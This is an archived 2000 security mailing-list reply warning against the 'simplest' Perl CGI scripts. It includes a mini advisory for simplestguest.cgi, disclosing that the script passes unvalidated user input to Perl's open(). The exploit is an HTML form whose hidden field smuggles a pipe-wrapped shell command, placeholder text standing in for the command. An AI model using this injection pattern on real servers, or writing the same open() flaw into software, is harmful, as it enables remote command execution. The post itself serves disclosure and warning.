OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Re: Insecure input validation in simplestmail.cgi
From: suidSNEAKERZ.ORG
Date: Wed Dec 13 2000 - 20:05:46 CST


> simplestmail.cgi is another Perl cgi written by "Tammie's HUSBAND" Leif
Wright.

The whole group of "simplest" cgi's are bad. web developers: dont use them

I didnt really post this because its pretty lame but i looked at a few of these
a while back and heres something i put on my site in feburary. (which used to
be suid.edu and is now www.sneakerz.org/~suid/)

suidsneakerz.org - mini advisory - Tammies Husband Guestbook CGI

Software: simplestguest.cgi
URL: http://www.conservatives.net/atheist/scripts/simplestguest.html
Version: Version 2
Platforms: Unix
Type: Input validation problem

Summary:

        Anyone can execute any command on the remote system with
        the priveleges of the web server.

Vulnerability:

        The perl code does no input validation and performs an
        open() on a user supplied input.

Exploit:

        Build a HTML form resembling:

        <form action=/cgi-bin/simplestguest.cgi method=POST>
                 <input type=hidden name=required value="NAME">
                 <input type=hidden name=guestbook
                value=" | <command goes here> |">
                 <input type=hidden name="NAME" value="X">
                 <input type=submit>
        </form>

        Of course you could simply send this in a POST request directly
        to the web server. Whatever.

http://www.sneakerz.org/~suid/

EOF